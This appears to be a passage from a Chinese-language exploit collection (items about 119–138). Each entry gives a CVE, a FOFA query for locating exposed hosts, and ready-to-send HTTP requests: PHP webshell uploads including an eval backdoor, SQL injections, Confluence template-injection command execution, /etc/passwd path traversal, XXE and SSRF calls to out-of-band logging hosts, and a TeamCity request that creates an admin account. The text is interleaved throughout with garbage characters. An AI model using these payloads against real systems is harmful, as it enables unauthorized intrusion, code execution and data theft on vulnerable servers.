: c/ m; y/ p( R' K9 eReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php+ e; Z. s- _3 H, y: V2 Q% ]
Sec-Fetch-Dest: empty! D! u9 F* l) U% v
Sec-Fetch-Mode: cors: W' N, f/ i$ v+ F: [5 Y- t
Sec-Fetch-Site: same-origin' x* G/ B# i- K4 X5 m
X-Forwarded-For: 1.1.1.1' J9 X- T7 L* e' f. G
X-Originating-Ip: 1.1.1.16 b3 B, R& G& e, l; z, B* r* B
X-Remote-Ip: 1.1.1.1& d4 D; n+ r% Q2 l( U
X-Remote-Addr: 1.1.1.1! g5 ]7 h/ y3 {
Te: trailers( J' v+ g4 Y8 H( [9 S) f- e
Connection: close
6 h m2 d1 M" D: ^% b
3 \+ v8 ~0 C( V: l# |4 Asrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
$ s% y$ s1 t- S6 K8 P0 B
G$ j. b$ w9 y: e5 ` {7 f8 H( q- c1 E. f. \) A% o- H A
120. 北京百绰智能S40管理平台导入web.php任意文件上传+ ?' p' f: O, s d, |. V2 i
CVE-2024-1253+ q$ s9 N E' R3 R/ l2 {
FOFA:title="Smart管理平台"+ Z2 i6 M3 s* ^( \$ a
POST /useratte/web.php? HTTP/1.15 O O R( Y2 S
Host: ip:port% Y# D6 y7 C% ~, K1 x4 H. m* q% M) {
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db2 @# N$ I* x2 c5 g/ Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko/ V6 @7 o: \7 D. {4 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( f' y, \. k3 Z5 B1 C; u: k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- ?7 Z, y1 A1 C- [4 |Accept-Encoding: gzip, deflate" ^1 u% D }9 C Y: t
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
& [5 ~3 Z7 d! bContent-Length: 597* b1 \3 c3 D. H
Origin: https://ip:port
) ~8 {( V u+ w# r9 N. c, u/ _Referer: https://ip:port/sysmanage/licence.php; d) k& B1 n d3 u
Upgrade-Insecure-Requests: 1
& l9 c6 K, w# l( j4 |- nSec-Fetch-Dest: document0 b, C3 ]; ^% E9 d+ A
Sec-Fetch-Mode: navigate3 z4 ?4 e2 @8 @) T, B0 @' D
Sec-Fetch-Site: same-origin6 j0 D0 f8 r& I1 N( {7 `
Sec-Fetch-User: ?1
- _; L3 G9 V: e7 r/ ^7 b+ W W. [Te: trailers; X8 J' E; [. p2 F) D
Connection: close1 S8 ^* H3 p" ~) P! p9 R }4 W2 g8 Q
7 N; p. H- N* B; L. W) k/ J-----------------------------42328904123665875270630079328
1 _. N/ R4 m. nContent-Disposition: form-data; name="file_upload"; filename="2.php"* `. V" V/ o. \9 f9 b' w4 n
Content-Type: application/octet-stream$ t ?4 s) Z2 ` N
" u! B. y- Q8 I) Q4 g2 v
<?php phpinfo()?>
, }5 {% ]+ |. a" U-----------------------------423289041236658752706300793285 `0 R; `# W5 i$ |" t
Content-Disposition: form-data; name="id_type"5 l9 C+ q' _6 {! z5 T
2 Z" J0 q" m; R; y% q
1- E7 C, H# T6 ]$ R& `7 j7 a
-----------------------------42328904123665875270630079328
# b8 K, W3 [5 l& W/ Z, {' f; Z4 fContent-Disposition: form-data; name="1_ck"
+ M9 O- u' E0 B% }& [+ n' w! B2 }3 x; ?! \2 ^
1_radhttp
$ a. Q2 X2 E7 V7 @$ w/ z* y-----------------------------42328904123665875270630079328
9 l- K* e- r4 a! p" \Content-Disposition: form-data; name="mode") ?: Q1 w) l2 N% ]
& k% O4 ~4 M% k8 ?import6 I6 g, I- {" Y8 _
-----------------------------42328904123665875270630079328
4 \1 b+ I3 m- j- }* K* a2 K& ]# j/ h1 C' ?$ n$ ]7 l
@/ s) i9 q/ |* V$ u文件路径/upload/2.php
# {" o' w& n2 T* t+ _( A+ g$ Z% y2 M6 c+ {& w6 x) k
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
( q' Z/ V! l6 } a5 d2 g9 ]" eCVE-2024-1918
7 z2 O& W% e+ |; f; K! LFOFA:title="Smart管理平台"% S" g8 \, X+ L2 @4 [; M
POST /useratte/userattestation.php HTTP/1.17 Q4 e' @- v! X3 U# _2 t/ ^- I/ H; x
Host: 192.168.40.130:8443
+ k/ k$ I4 k3 }; ^7 aCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50. { C2 [% N9 [& J
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
9 d! p! e! i7 e# d% ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: o7 s; j* R2 {9 T9 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 T# ?$ D" V G& j
Accept-Encoding: gzip, deflate# p7 e5 D5 k7 O+ `3 e: ]
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328' w' m; Y0 x" ]
Content-Length: 5920 ]/ W% K" x) b* e
Origin: https://192.168.40.130:84432 r2 N7 d2 {9 ^7 Y. f
Upgrade-Insecure-Requests: 12 Z; n+ l& T; E
Sec-Fetch-Dest: document2 V: O4 A9 W. T( h3 S0 d' i! ^
Sec-Fetch-Mode: navigate3 S6 r% Q' `9 h' M6 w3 n
Sec-Fetch-Site: same-origin
7 L0 Q& }" k) hSec-Fetch-User: ?1; R% Z4 @! @+ Z2 w
Te: trailers
" W. i& R$ I, R8 s$ d+ H& {Connection: close- h8 Z7 h0 Q1 p. e6 Y8 Y/ s: f2 @
9 v6 U+ M. u5 F' W1 Q& n-----------------------------423289041236658752706300793283 x( V7 k0 ~! q9 H# L9 g5 }; c+ U
Content-Disposition: form-data; name="web_img"; filename="1.php"
" ^4 b. M. T0 X8 `6 b- SContent-Type: application/octet-stream' D, ]3 ~4 Y/ l" M* ^& Q
# \1 C' C; t4 ~3 e<?php phpinfo();?># t: b9 S. Y3 O
-----------------------------42328904123665875270630079328
7 o+ f* q, y1 q. l+ ^4 D1 M4 V3 d0 dContent-Disposition: form-data; name="id_type"* A: q4 k$ ?% H" {
2 v; r0 J+ v/ e; F- o
1# {. j# ^. Z1 u7 w, A
-----------------------------423289041236658752706300793289 k7 V3 J$ t- P8 W4 J7 z9 x4 ^* M
Content-Disposition: form-data; name="1_ck"
! R# z2 J& Z3 d0 c4 ?! x3 ]5 \- l7 u0 }# J" R
1_radhttp$ P2 e5 U# X3 |" u- u8 F& F
-----------------------------42328904123665875270630079328
# g% t% @( T" i7 n6 C" E) NContent-Disposition: form-data; name="hidwel"/ I* F1 f% t5 m2 A, P. F. t4 B
' A% g8 @) {2 U+ d( Y& D" a/ D% L
set+ w' ]+ N* ^' r* g
-----------------------------42328904123665875270630079328
% Y6 H2 E) G6 K& d* l, O% Q, A! w! I2 `+ Z6 [9 W# `. {; u
- N) j: T: Y% l; k/ Y* h/ Zboot/web/upload/weblogo/1.php8 h2 t8 ^ w8 c" Y* C4 Y
/ f6 i% d3 Z6 D: t g! c& }
122. 北京百绰智能s200管理平台/importexport.php sql注入
1 ~( Z5 v& W! ? g: b: l* CCVE-2024-27718FOFA:title="Smart管理平台"
' ~$ ~9 b% K' [; D& N其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()) ^, D, k* q' p( {
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
2 x0 b. C+ ?$ _8 r( {+ YHost: x.x.x.x
+ |# W* `& ]5 R. JCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0$ m6 U7 S. D9 k6 P. o! g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 N5 {' Z6 i6 \# a2 ^& g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 f9 m. ~5 |: E6 N% BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: X* y9 C2 Y# ^ g4 \4 ^' MAccept-Encoding: gzip, deflate, br+ u9 o, K& b$ ~' H1 y
Upgrade-Insecure-Requests: 1- C: R! D" V' {! b. H# f
Sec-Fetch-Dest: document
- n& [6 O6 {! g% Q1 u8 hSec-Fetch-Mode: navigate
3 b& ^8 d3 W7 X# j8 r. Y$ F* I( [Sec-Fetch-Site: none
, B/ S5 [. `$ \& \+ G; ]Sec-Fetch-User: ?1' {: F' i: F# N$ H B3 u4 o. V
Te: trailers: r- ]6 S( R3 I4 k
Connection: close
* C+ w6 @* C+ u6 p$ O# T5 r4 a3 ` \* @& ^' V. m! k
2 T( v+ }# w5 e& g( v( R123. Atlassian Confluence 模板注入代码执行
+ ^& K7 v' b$ ]8 s) e. O- r% xFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
; j& V, J5 ~7 v9 [POST /template/aui/text-inline.vm HTTP/1.19 o5 N8 S5 s- _
Host: localhost:8090
. z! D6 g4 C7 ^. \9 @/ [Accept-Encoding: gzip, deflate, br) e V- B. M1 J. A9 P+ E1 ~
Accept: */*
* V$ r- e( j K% ~0 u3 WAccept-Language: en-US;q=0.9,en;q=0.8! x" b8 c" Z5 d2 g8 w9 y4 {( W0 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+ o6 }& s8 T& uConnection: close' C! p9 A, R2 q
Content-Type: application/x-www-form-urlencoded- _; B4 w+ b6 S5 y8 @5 q$ }
: c6 n. w/ T& a: j# T% |
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
2 U, `+ ?. c& ` t
1 r! U Z7 v9 ~" E& V+ X
. f) `1 R4 P/ L A/ m! z& H8 ~' N124. 湖南建研工程质量检测系统任意文件上传
- T: M8 N. X( M% K& J$ CFOFA:body="/Content/Theme/Standard/webSite/login.css"
' z* E3 g" ~" U1 TPOST /Scripts/admintool?type=updatefile HTTP/1.1
/ ]7 ^9 i) |! ?. _( X; ~Host: 192.168.40.130:8282
/ V0 m2 j. `- J {" OUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
/ C$ \9 g2 A& j' O. PContent-Length: 72- g/ { y u/ q' E- ~( g2 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8# L/ D# Q2 s' c
Accept-Encoding: gzip, deflate, br
7 o% D' e) F CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- }! g7 u( a* L8 V$ a* [- fConnection: close( D# ~8 ]( j, T
Content-Type: application/x-www-form-urlencoded
# g% v+ j! X7 M& P& {( u; T3 n! P4 w$ Z$ A
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
, }/ w s/ L3 l
( R# ~( }- [; ]9 N/ Y: P# X( e" i+ H3 U1 a
http://192.168.40.130:8282/Scripts/abcgcg.aspx
& [( s# ^2 x# a8 y! d* ]) P, i u7 j3 H3 b, v5 e1 I8 `
125. ConnectWise ScreenConnect身份验证绕过, d9 a; Y5 J6 n. j& L
CVE-2024-1709% Q7 V$ o2 r$ f" t- i$ {; b& g# ?
FOFA:icon_hash="-82958153"
6 d8 \3 [0 X! e, l) Vhttps://github.com/watchtowrlabs ... bypass-add-user-poc" c( i2 ]5 q1 E8 O; o& |* y6 N% {" S- |
9 s" U8 Y, `) B, M: U
- g) T$ J6 r2 B
使用方法8 \% X9 v" I8 v
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
* r3 V9 f! y& T; A: S- s! O8 L* u( j* z/ f* u% l: I6 w3 y& ]
2 L4 R6 J) \% P+ n2 w创建好用户后直接登录后台,可以执行系统命令。
7 a. v, V5 ?- p& ~! S1 Z& S+ [
6 U: x C* L+ s* @5 o" [9 [126. Aiohttp 路径遍历, X* E t7 T$ N W0 o/ J
FOFA:title=="ComfyUI"
+ ~/ { U7 ]) h* W! `GET /static/../../../../../etc/passwd HTTP/1.1
' Q+ X! _3 R& ~1 ZHost: x.x.x.x
- @5 k6 i5 _( i6 m* P2 C# gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% b# Y1 b# E- x9 ]- Q) JConnection: close( M* D/ d" J' M9 |, j) z
Accept: */*
1 a$ _# Q9 Z1 N2 E1 H) RAccept-Language: en
6 a6 y$ s5 V" @7 MAccept-Encoding: gzip
$ U: b; y/ Z% C# G/ e) l, c3 p
8 ^, \, M: M9 j+ S" @1 d" l' |- E) j/ X. c* _
127. 广联达Linkworks DataExchange.ashx XXE
7 I9 k8 D- ^+ xFOFA:body="Services/Identification/login.ashx"
: i( ]; r1 l, R- H4 Z, f% H/ U( fPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.17 L5 I; x! {- g4 I2 A
Host: 192.168.40.130:88882 K* |) p! x8 e; `( t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.362 h4 I& E7 E5 L3 [. U' I
Content-Length: 415+ p7 [: ~' U5 W* T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 K: x( m1 ^. D# T
Accept-Encoding: gzip, deflate
) G. w+ e: `0 o% xAccept-Language: zh-CN,zh;q=0.9! M5 C3 g9 V, c9 G8 f- l
Connection: close* e2 o. t' K- {7 g9 n3 V# X
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
: Z- w3 I/ ^4 y5 @8 |: y2 VPurpose: prefetch
. X% Y8 Z% M+ a+ U, \- L: x4 ?Sec-Purpose: prefetch;prerender7 u, y8 H4 h$ r2 C4 @6 o, S
. U; ]6 W5 [+ l
------WebKitFormBoundaryJGgV5l5ta05yAIe0/ F# }2 B1 p# e* A$ [
Content-Disposition: form-data;name="SystemName"4 o/ o! P( G. g6 g* N- I% T" S
6 K: n1 @4 q3 H% ?
BIM
2 D. v, f; u% |------WebKitFormBoundaryJGgV5l5ta05yAIe0
. w3 H( D4 |; \+ ?+ M- y" N+ c" SContent-Disposition: form-data;name="Params"
$ p4 ~2 n+ b6 |( T4 DContent-Type: text/plain# s2 @6 l5 o: `' T3 r
- ]7 M' t/ Z; i
<?xml version="1.0" encoding="UTF-8"?>/ N* J; B# M1 O( f# Y* A' J( g& {
<!DOCTYPE test [
; ]( m5 I: t( B8 g" \<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
. b8 \: Q. `9 d: N]
0 P& {4 c! ], G+ A: |+ G( j>
5 C D+ ~9 J) I+ U v<test>&t;</test>
! J. v( k) o2 J------WebKitFormBoundaryJGgV5l5ta05yAIe0--9 l* e) G# d$ D
9 ?/ C+ q, F; d/ O. ^: n& A4 w* [+ V% {9 J/ n
0 M& |( N" g$ Z& O
128. Adobe ColdFusion 反序列化& d4 B$ ], M; i9 @' C3 c. P
CVE-2023-38203 K5 v, s, ]1 Z& W) v9 \
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)0 S/ I) Z7 p( o4 x
FOFA:app="Adobe-ColdFusion"
6 e: u* {. r ^% |( G/ S7 ?PAYLOAD- y5 `9 n7 c' I- q' n. l
- s! B5 m8 {1 ?: F& p129. Adobe ColdFusion 任意文件读取, @$ G% K" O O! d: o" G
CVE-2024-20767
2 _( w( t7 n" p8 H* C" `FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
5 ~0 r6 ~9 R, S. ]第一步,获取uuid
6 [' J/ z! k' d! e1 p7 t& vGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1$ C4 t( w/ ~# l9 p
Host: x.x.x.x
9 m" |+ a' c$ ~. C- @/ QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 [- [. F, m9 z& ]
Accept: */* a9 @6 X j1 f7 d1 \
Accept-Encoding: gzip, deflate
! i* c* a; Q$ _: HConnection: close
% `- i1 }& q1 R# x; s
+ F% P( G9 Q& O! |! `3 | Q2 o, q/ ^; O$ W5 M! B7 L0 E
第二步,读取/etc/passwd文件
! E( s# R/ F2 t6 S1 v# F) D7 q7 MGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1; s5 n( ^3 F8 \. K1 H( |; a
Host: x.x.x.x$ j! L1 F0 y4 V( L$ T4 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) z( a4 S( P. N/ ~' R: a3 {" f
Accept: */*
( d! {8 z# a% {8 Y, Q0 SAccept-Encoding: gzip, deflate
1 F0 S6 F$ R4 v" R9 a& kConnection: close; @9 E9 [! T8 | I4 ~
uuid: 85f60018-a654-4410-a783-f81cbd5000b9- @* `& _3 c# B0 N
0 S- z7 B5 h& F9 ?3 |% S% [, C: y, b+ H4 k% n
130. Laykefu客服系统任意文件上传
+ h$ m. c" H9 qFOFA:icon_hash="-334624619"/ \3 u6 p) d( b3 F. Z! w* T' P
POST /admin/users/upavatar.html HTTP/1.1
: q* e& Y. |: N/ g# |0 e: XHost: 127.0.0.1' ^% K0 O- u0 Y9 r' t) X
Accept: application/json, text/javascript, */*; q=0.014 t" q' b, @( ~' u
X-Requested-With: XMLHttpRequest$ j$ V5 {" ?" t3 n8 \
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
' f7 O1 [" W9 Y* S# S- D+ jContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR2 M' h& e. ]* C* C& w
Accept-Encoding: gzip, deflate
( \) A% M7 [# }" {: P, Y9 X; aAccept-Language: zh-CN,zh;q=0.90 L4 \/ F7 e( l$ v" P% i, R3 Y
Cookie: user_name=1; user_id=3 |/ ?8 b9 D- Q9 }: a& C
Connection: close
& F& r0 ~' \1 Y3 [
" X6 r# D. A9 B7 W+ R7 _. x------WebKitFormBoundary3OCVBiwBVsNuB2kR
4 e) z" ?/ Q2 ~( n/ C' _9 eContent-Disposition: form-data; name="file"; filename="1.php"
: o9 _/ S. f: z LContent-Type: image/png
& l3 Z8 s, {5 K2 i) A% k ! `$ [& Y; V9 J0 i
<?php phpinfo();@eval($_POST['sec']);?>
' F/ g5 E) @6 [: d) B- ]/ B1 l------WebKitFormBoundary3OCVBiwBVsNuB2kR--% Z' k. q3 W) ]$ [. N9 X, f) N% m
3 |' u3 ?( x- o% u% t3 F- J% P c: _( v% {2 z
131. Mini-Tmall <=20231017 SQL注入
) |* m2 K- U/ i' n' SFOFA:icon_hash="-2087517259"/ W2 d5 Q' g6 i5 ]+ `, e$ H
后台地址:http://localhost:8080/tmall/admin4 ]8 E2 U2 c# @" ^' G
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
8 y. J3 K1 Y' n$ g' E7 ]: n$ ?$ w+ O7 d0 [" i% T: f
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
1 s! I5 E5 a3 ]8 R6 ~) X S( z% XCVE-2024-27198
; c' }! b8 \$ NFOFA:body="Log in to TeamCity"
5 z! F; N7 x$ B6 f* CPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
6 n- F; v8 V5 d6 n6 s+ ~Host: 192.168.40.130:8111
) y! x, v4 @5 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 N U) ^2 F! N+ FAccept: */*
! T' ~2 `3 F8 jContent-Type: application/json
: D8 `1 x- c8 y A1 q; nAccept-Encoding: gzip, deflate+ f* m9 [/ f! M& O% a
& N' x) o- L8 I5 d{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
/ c! c8 |, o- ~1 u
7 S- @% X% X! v3 R1 E" m% [5 u% L p0 ?
CVE-2024-27199$ v( d W* ^9 F# z
/res/../admin/diagnostic.jsp
0 Q! G0 L: |! Q) f9 y; t/.well-known/acme-challenge/../../admin/diagnostic.jsp
% l' v# t% I5 w, e" f/update/../admin/diagnostic.jsp/ y* q: e( }1 ?+ I i
% z v/ p* X' t8 {/ K
% u2 w9 {9 m( E3 ~CVE-2024-27198-RCE.py
% K+ X' D$ z& X' h/ P
5 @ [$ p8 f1 G/ n+ m9 }3 z3 g133. H5 云商城 file.php 文件上传
6 v: M& g0 p o6 PFOFA:body="/public/qbsp.php"- s$ L C: ]+ H+ f5 z2 O* B
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
. y# d' y7 f6 |/ L, ?" A/ r# IHost: your-ip) ?6 e k8 _/ @0 ~% `9 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
3 B8 s5 l+ `& W( @Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
' C( e$ N6 P3 p7 D
1 k# c9 u3 L0 `' Q------WebKitFormBoundaryFQqYtrIWb8iBxUCx
9 m9 l f ?: b" C2 zContent-Disposition: form-data; name="file"; filename="rce.php". R- L0 y5 R1 x! _/ z% O/ \) B* e# |
Content-Type: application/octet-stream
, Y0 J I. l. n% K/ J $ Q; I; Y8 A( G+ U% x
<?php system("cat /etc/passwd");unlink(__FILE__);?>
' B9 N* ]) @; M# q2 e/ W------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
. N7 ?% k- {" ] E3 L" d* R" z- x+ f: A* {
$ m( u/ |; z/ j5 I; l
. x" j, ?* S* q" t7 \6 A/ f134. 网康NS-ASG应用安全网关index.php sql注入
2 v4 ~: n2 U+ A5 _0 x- K6 \, gCVE-2024-2330" N! |2 G+ M- p: A" B; P% _; M: F
Netentsec NS-ASG Application Security Gateway 6.3版本
1 f" R2 ^1 N/ p5 U2 _FOFA:app="网康科技-NS-ASG安全网关", n2 c& l9 c5 y6 J4 m/ o
POST /protocol/index.php HTTP/1.1# T }2 p u/ e' o/ g# }
Host: x.x.x.x
7 g, y0 w) y% n3 t8 GCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de0 x+ h( k" c% d) ?; K/ o3 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
( l0 Q1 s( a! I9 J# z$ {/ eAccept: */*
, M. M m# |! P! _& R, V! k6 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 Z- T9 z& u0 n. S. T# f9 rAccept-Encoding: gzip, deflate8 T! u4 h# e6 Y; _1 H; G
Sec-Fetch-Dest: empty( r0 }; b) R" p
Sec-Fetch-Mode: cors
4 {7 R# w! _5 r1 O0 w9 y# OSec-Fetch-Site: same-origin/ o( C u" ]! n: a
Te: trailers
+ y& m, _' S& f+ a& ^5 sConnection: close
0 O! [2 E; t4 E o" ?Content-Type: application/x-www-form-urlencoded3 e" _( m- O2 Y) K
Content-Length: 263* [$ R P. x; Q6 K
3 z# Y% K( s5 c% S+ [2 v
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
8 \- p7 t# ~* F7 S1 n9 D* C; @3 X) L& q, K, r
3 x0 ^5 R2 N* ]9 ? o! t& i135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
/ D- m; M) J7 LCVE-2024-2022, t6 m* j* p$ i8 E P
Netentsec NS-ASG Application Security Gateway 6.3版本
8 ]4 {7 d# a) E- aFOFA:app="网康科技-NS-ASG安全网关": f/ o5 ?1 L* a% \9 n/ ]% n0 k
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1$ S) ^" [% d4 u
Host: x.x.x.x( e, X) ^& d4 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) V; e6 V, D0 a4 r; n aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( y! A7 ^( J# ?+ U+ rAccept-Encoding: gzip, deflate: e: C' j: D8 s5 _+ X$ z
Accept-Language: zh-CN,zh;q=0.9) l: b h! T1 @4 p* j6 A% \7 w
Connection: close
5 F+ k6 j1 U5 g! H7 n
- U9 w& h6 F1 E0 h. e' O9 s% x! c" [/ r* h0 q' K2 S. D
136. NextChat cors SSRF
8 W& n2 b% G) n, V5 a& X+ GCVE-2023-49785
h' C3 }( h$ `9 j' Q b& I; x! PFOFA:title="NextChat"
3 {$ P6 ~3 M3 f1 K6 {( c. T7 CGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
K6 g% z" g/ B% ?5 NHost: x.x.x.x:10000 M& m& B, ~. q, R) L A( w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
E# x1 T" f1 ZConnection: close6 `# m ]# F2 W7 \
Accept: */*3 \* d3 u) U' r3 s
Accept-Language: en# Y# c# c( } @
Accept-Encoding: gzip: H6 _( c' x$ u3 X8 W
; W" x0 ^% q) H7 E8 F l
& E1 P! n/ _( @( y. F0 l
137. 福建科立迅通信指挥调度平台down_file.php sql注入0 @. l, e, S m# M: u S
CVE-2024-2620& i+ R/ {' Y3 S, z
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
1 O( T% N J, P! ]GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.15 K N$ q& K% V' C6 G
Host: x.x.x.x
" K% ~8 n/ N: p6 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 U* C6 V7 {" e& a* Z5 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' j7 T" j. M* i" |: @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 Y% C4 w" M. A& C% j4 y/ IAccept-Encoding: gzip, deflate, br( z, G/ T& N# H) i6 b* f2 h) q
Connection: close
1 L" }8 A# |4 T3 u7 y' bCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
& E8 b: Z: J* R. G7 t' e8 a$ PUpgrade-Insecure-Requests: 1
% D* W9 F1 \2 w( H
' D3 U1 u0 R' D+ s( r( N
" b; h Q8 B+ O% c2 [ I* ~3 O138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
2 q3 L; h- ~5 M2 d; Q" _, L& rCVE-2024-2621
8 S3 _9 w% \; F* N2 O; ` ZFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; S( p7 M- m/ V( VGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
. y3 o0 |3 ^' v" Q; [$ R) DHost: x.x.x.x
# }, ]+ p, i$ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 s% N2 l4 j o+ {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* y+ Q' P; O& T" z, ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& J1 G# o7 @' F4 }4 VAccept-Encoding: gzip, deflate, br
* d7 N* b+ v- q, o# V" @4 K- uConnection: close ?9 P: Y# r3 I, Z5 ~
Upgrade-Insecure-Requests: 12 K6 Q' m0 ?$ ~$ q
$ j+ i3 S* \# K% [/ H- l
